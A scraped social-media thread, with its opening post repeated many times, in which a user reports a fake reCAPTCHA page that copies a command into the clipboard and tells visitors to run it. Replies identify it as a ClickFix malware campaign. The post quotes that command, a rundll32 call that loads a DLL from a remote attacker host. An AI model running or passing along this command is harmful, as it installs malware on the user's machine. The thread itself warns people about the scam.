At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
-
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
@deviantollam yes this is a hacked site/malware. ClickFix campaign.
-
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
@deviantollam horrifying. I assume they're using rundll32 because Windows won't let you run an untrusted exe directly from a remote server path like that?
-
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
wow... that's like telling someone to pick one of three random unlabelled liquids and chug it to get access to a food safety seminar...
-
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
@deviantollam@defcon.social Definitely malware. It's quite a common trick. (aka clickfix) -
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
@deviantollam There's a 200% chance you're installing a virus
you of all people should be able to sniff that one out. -
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
@deviantollam You're lucky if you haven't encountered that before. This kind of scam has been around a a few years already, often on shady "driver update" sites and the like.
-
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
@deviantollam this is a common malware technique. They got pwned.
-
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
@deviantollam Nooooo, and that totally looks like something my mom would fall for and then I would have to spend hours fixing her computer. Don't do it!
-
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
I wouldn't touch that with somebody else's barge-pole.
-
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
@deviantollam
“You will observe and agree”? That’s not happening. -
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
@deviantollam Oh, HELL no!
-
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
@deviantollam Indeed, Clickfix
-
At first I thought thought I had found a candidate for "most horrifying reCAPTCHA process ever devised.
(UPDATE: OK, yeah, that as I suspected... this is just straight up malware. I spoke with the business and confirmed things with them.)
LOL, Would any of you ever trust a web site to:
1. inject a long text string into your clipboard
2. ask you to open Command Prompt
3. then expect you to blindly paste this long string into your Command Prompt and simply RUN it
If you're curious, this is the string it is asking users to paste and run in their command prompt...
rundll32.exe \\dynmeshex6.dax8sovel.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
@deviantollam
Please report on https://safebrowsing.google.com/safebrowsin... as Malware > Web Malware -
@foundthefault I'm fortunate enough to have never encountered it before. Wild.
-
R relay@relay.publicsquare.global shared this topic
